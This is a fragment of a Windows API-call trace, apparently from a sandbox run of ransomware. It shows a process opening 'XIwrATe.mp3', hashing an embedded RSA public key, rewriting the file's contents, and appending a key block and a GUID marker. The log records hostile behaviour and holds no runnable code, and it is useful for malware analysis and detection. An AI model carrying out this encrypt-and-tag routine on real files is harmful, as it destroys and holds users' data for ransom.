ftLastWriteTime.dwHighDateTime=0x1d8a565, nFileSizeHigh=0x0, nFileSizeLow=0x32ff, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XIwrATe.mp3", cAlternateFileName="")) returned 1 [0200.920] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0200.920] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xd6) returned 0x6e2d18 [0200.920] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0200.920] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\sj76aMesI3jmtOuE2hz\\YUyI2uqRriEqQVB sFMm\\XIwrATe.mp3") returned=".mp3" [0200.920] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\sj76aMesI3jmtOuE2hz\\YUyI2uqRriEqQVB sFMm\\XIwrATe.mp3" (normalized: "c:\\users\\keecfmwgj\\desktop\\sj76amesi3jmtoue2hz\\yuyi2uqrrieqqvb sfmm\\xiwrate.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0200.921] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=13055) returned 1 [0200.921] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0200.924] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x32d9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0200.924] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0200.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0200.926] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0200.927] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0200.927] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x32ff, lpOverlapped=0x0) returned 1 [0200.927] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0200.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0200.927] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0200.928] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0200.928] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c0e0) returned 1 [0200.929] CryptCreateHash (in: hProv=0x67c0e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0200.929] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0200.929] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0200.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0200.929] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0200.929] GetLastError () returned 0x0 [0200.929] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0200.929] CryptReleaseContext (hProv=0x67c0e0, dwFlags=0x0) returned 1 [0200.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0200.930] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0200.930] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0200.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0200.930] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0200.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0200.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0200.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3300) returned 0x2ea99b0 [0200.930] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0200.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0200.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0200.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0200.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0200.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0200.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8fb70 [0200.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3380 [0200.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8fbb8 [0200.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3398 [0200.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea33c8 [0200.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3428 [0200.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea33e0 [0200.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0200.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0200.931] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0200.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0200.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea33c8 | out: hHeap=0x620000) returned 1 [0200.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea33e0 | out: hHeap=0x620000) returned 1 [0200.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3428 | out: hHeap=0x620000) returned 1 [0200.932] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0200.932] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0200.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3428 [0200.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0200.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea33e0 [0200.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0200.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea33c8 [0200.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0200.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c998c8 [0200.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0200.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0200.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0200.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99c10 [0200.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85ac8 [0200.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0200.933] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0200.933] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea33e0 | out: hHeap=0x620000) returned 1 [0200.933] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0200.933] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea33c8 | out: hHeap=0x620000) returned 1 [0200.933] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0200.933] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0200.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3428 | out: hHeap=0x620000) returned 1 [0200.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0200.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0200.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0200.934] GetCurrentThreadId () returned 0x66c [0200.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0200.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea83e8 [0200.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9728 [0200.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c0e0 [0200.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0200.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0200.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0200.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0200.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0200.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0200.935] GetCurrentThreadId () returned 0x66c [0200.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0200.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0200.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0200.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0200.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0200.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0200.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0200.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0200.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0200.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0200.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0200.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0200.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e960b0 [0200.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0200.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3428 [0200.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0200.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0200.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0200.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0200.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0200.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0200.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0200.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0200.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea33c8 [0200.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0200.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0200.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0200.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0200.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0200.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0200.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0200.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea33e0 [0200.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0200.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0200.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0200.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea33b0 [0200.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0200.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3440 [0200.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0200.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0200.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0200.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3410 [0200.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0200.938] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea33f8 [0200.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0200.938] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3458 [0200.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea33f8 | out: hHeap=0x620000) returned 1 [0200.938] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea33f8 [0200.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3410 | out: hHeap=0x620000) returned 1 [0200.938] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0200.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0200.938] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0200.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0200.938] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0200.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea33c8 | out: hHeap=0x620000) returned 1 [0200.938] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea33c8 [0200.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0200.938] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0200.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3428 | out: hHeap=0x620000) returned 1 [0200.938] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0200.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3458 | out: hHeap=0x620000) returned 1 [0200.938] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0200.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0200.938] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99af8 [0200.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0200.939] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0200.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea33c8 | out: hHeap=0x620000) returned 1 [0200.939] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0200.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0200.939] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0200.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0200.940] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c0e0 | out: hHeap=0x620000) returned 1 [0200.940] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0200.941] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0200.941] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0200.941] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0200.941] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0200.942] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0200.942] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0200.942] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0200.942] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea33f8 | out: hHeap=0x620000) returned 1 [0200.942] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0200.942] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3440 | out: hHeap=0x620000) returned 1 [0200.942] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0200.942] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea33e0 | out: hHeap=0x620000) returned 1 [0200.942] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea33b0 | out: hHeap=0x620000) returned 1 [0200.942] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0200.943] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9728 | out: hHeap=0x620000) returned 1 [0200.943] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0200.943] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3398 | out: hHeap=0x620000) returned 1 [0200.943] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8fbb8 | out: hHeap=0x620000) returned 1 [0200.943] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0200.944] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e960b0 | out: hHeap=0x620000) returned 1 [0200.944] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0200.945] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0200.945] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0200.945] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0200.945] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0200.945] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0200.945] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0200.946] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0200.946] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0200.946] WriteFile (in: hFile=0x510, lpBuffer=0x2ea99b0*, nNumberOfBytesToWrite=0x32fa, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea99b0*, lpNumberOfBytesWritten=0x312fb14*=0x32fa, lpOverlapped=0x0) returned 1 [0200.947] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea99b0 | out: hHeap=0x620000) returned 1 [0200.947] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x32ff, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0200.947] WriteFile (in: hFile=0x510, lpBuffer=0x2e95ea0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95ea0*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0200.947] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0200.947] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4998 [0200.947] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0200.947] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0200.947] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0200.948] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0200.948] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4998 | out: hHeap=0x620000) returned 1 [0200.948] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0200.949] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0200.949] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0200.949] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0200.949] CloseHandle 